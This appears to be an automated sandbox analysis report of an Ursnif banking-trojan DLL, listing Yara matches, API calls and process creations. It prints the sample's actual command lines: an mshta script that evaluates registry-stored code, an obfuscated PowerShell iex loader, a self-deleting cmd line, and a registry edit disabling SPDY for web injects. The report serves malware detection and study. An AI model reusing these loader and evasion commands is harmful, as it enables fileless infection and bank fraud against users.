                      Source: Yara matchFile source: 00000002.00000003.284844503.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284896687.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330946552.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 1308, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.51294a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.1350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.56fa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.56fa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51294a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.57a6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.57794a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000021.00000000.403852849.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.404491813.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.451962892.0000000005129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.514581941.0000021CBC11E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330837608.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330869970.0000000005779000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.452499963.00000000011A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.405551688.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454256522.000000000547F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.284358027.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284640245.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330015857.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284923269.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.282160828.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.282249243.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.281975107.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.331626577.00000000055FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284844503.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284896687.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330946552.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 1308, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.51294a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.1350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.56fa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.56fa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51294a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.57a6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.57794a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000021.00000000.403852849.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.404491813.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.451962892.0000000005129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.514581941.0000021CBC11E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330837608.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330869970.0000000005779000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.452499963.00000000011A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000000.405551688.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454256522.000000000547F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_01355FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 628df1368bdb5.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 408
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_01354BF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_01351645
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0135829C
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007BB4B8
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007B9660
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007BEEF8
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007C1864
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D7850
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007C2830
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D98A8
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D80A8
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007B716C
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007CE120
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007B5110
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007B410C
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007CB9E0
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D51A8
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007C1248
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007C4240
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007DC220
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D2AD8
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D8AC0
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D73EC
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007CC46C
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007DAC50
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007B3C3C
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D2428
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007BD404
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007B34D8
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007DD4D4
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D34C0
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007C6CA4
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D0530
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007CCD1C
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007B9D1C
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D7DB4
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007C8670
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D1E5C
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D1638
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007C2EE8
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007CBED0
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007B1EA8
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D5684
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007C6F78
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007C4F5C
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D772C
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007B572C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_01354321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0135190C GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_01356D0A NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_013584C1 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007C583C NtCreateSection,
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007B40C0 NtReadVirtualMemory,
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007DA148 NtQueryInformationProcess,
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007BB11C RtlAllocateHeap,NtQueryInformationProcess,
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007C41D8 NtMapViewOfSection,
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007BAA6C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D04CC NtAllocateVirtualMemory,
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007B6D24 NtWriteVirtualMemory,
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007B65E4 NtQueryInformationToken,NtQueryInformationToken,NtClose,
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007B9660 NtSetContextThread,NtUnmapViewOfSection,NtClose,
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007EF002 NtProtectVirtualMemory,NtProtectVirtualMemory,
                      Source: 628df1368bdb5.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs 628df1368bdb5.dll
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: 628df1368bdb5.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 628df1368bdb5.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 408
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 416
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 440
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qiip='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qiip).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES10A0.tmp" "c:\Users\user\AppData\Local\Temp\vebwfha3\CSC57533E6B898B4B7BB8DAE45DDD64B0AA.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20CD.tmp" "c:\Users\user\AppData\Local\Temp\hpvnexdj\CSC5D09D8212D1C47D8BF5AC4D6502884C9.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\628df1368bdb5.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES10A0.tmp" "c:\Users\user\AppData\Local\Temp\vebwfha3\CSC57533E6B898B4B7BB8DAE45DDD64B0AA.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20CD.tmp" "c:\Users\user\AppData\Local\Temp\hpvnexdj\CSC5D09D8212D1C47D8BF5AC4D6502884C9.TMP"
                      Source: C:\Windows\System32\control.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\628df1368bdb5.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220525Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF019.tmpJump to behavior
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@28/31@0/2
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_013568BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{A4AE14BF-B329-7663-5D18-970AE1CCBBDE}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_01
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{C052CD84-1FA7-F2C9-A9F4-C346ED68A7DA}
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3412
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.337566379.000000000040D000.00000002.00000001.01000000.00000003.sdmp, 628df1368bdb5.dll
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.390410461.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.393947886.00000000065C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.390410461.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.393947886.00000000065C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_01357EA0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0135828B push ecx; ret
                      Source: C:\Windows\System32\control.exeCode function: 33_2_007D4492 push ss; ret
                      Source: 628df1368bdb5.dllStatic PE information: section name: .erloc
                      Source: 628df1368bdb5.dllStatic PE information: real checksum: 0x79835 should be: 0x7550d
                      Source: vebwfha3.dll.28.drStatic PE information: real checksum: 0x0 should be: 0x1039a
                      Source: hpvnexdj.dll.31.drStatic PE information: real checksum: 0x0 should be: 0xe3ae
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.284358027.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284640245.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330015857.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284923269.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
